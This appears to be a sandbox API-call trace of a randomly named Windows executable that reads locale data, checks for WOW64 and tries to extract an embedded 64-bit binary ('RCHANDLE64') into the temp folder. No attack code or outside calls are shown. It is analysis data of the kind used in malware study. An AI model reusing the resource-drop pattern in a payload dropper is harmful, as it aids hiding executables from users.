[0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0267.178] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0267.179] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0267.179] GetCurrentThreadId () returned 0x5a0 [0267.179] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x1e0c9943, hStdError=0x475810)) [0267.179] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0267.179] GetFileType (hFile=0x38) returned 0x2 [0267.179] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.179] GetFileType (hFile=0x3c) returned 0x2 [0267.179] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0267.179] GetFileType (hFile=0x40) returned 0x2 [0267.179] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0267.179] GetEnvironmentStringsW () returned 0x5c1e60* [0267.179] FreeEnvironmentStringsW (penv=0x5c1e60) returned 1 [0267.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0267.180] GetLastError () returned 0x0 [0267.180] SetLastError (dwErrCode=0x0) [0267.180] GetLastError () returned 0x0 [0267.180] SetLastError (dwErrCode=0x0) [0267.180] GetLastError () returned 0x0 [0267.180] SetLastError (dwErrCode=0x0) [0267.180] GetACP () returned 0x4e4 [0267.181] GetLastError () returned 0x0 [0267.181] SetLastError (dwErrCode=0x0) [0267.181] IsValidCodePage (CodePage=0x4e4) returned 1 [0267.181] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0267.181] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0267.181] GetLastError () returned 0x0 [0267.181] SetLastError (dwErrCode=0x0) [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0267.181] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0267.181] GetLastError () returned 0x0 [0267.181] SetLastError (dwErrCode=0x0) [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0267.181] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0267.181] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0267.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xd3\x98\x0c\x1e\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0267.181] GetLastError () returned 0x0 [0267.181] SetLastError (dwErrCode=0x0) [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0267.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0267.181] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0267.181] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0267.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xd3\x98\x0c\x1e\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0267.181] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0267.181] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0267.182] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0267.182] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0267.182] GetCurrentProcess () returned 0xffffffff [0267.182] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0267.182] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0267.182] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0267.182] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0267.182] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0267.182] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0267.182] LockResource (hResData=0x43c648) returned 0x43c648 [0267.182] GetCurrentPackageId () returned 0x3d54 [0267.182] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0267.182] GetLastError () returned 0x20 [0267.182] GetLastError () returned 0x20 [0267.182] SetLastError (dwErrCode=0x20) [0267.182] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetLastError () returned 0x20 [0267.183] SetLastError (dwErrCode=0x20) [0267.183] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0267.207] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0267.226] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0267.226] 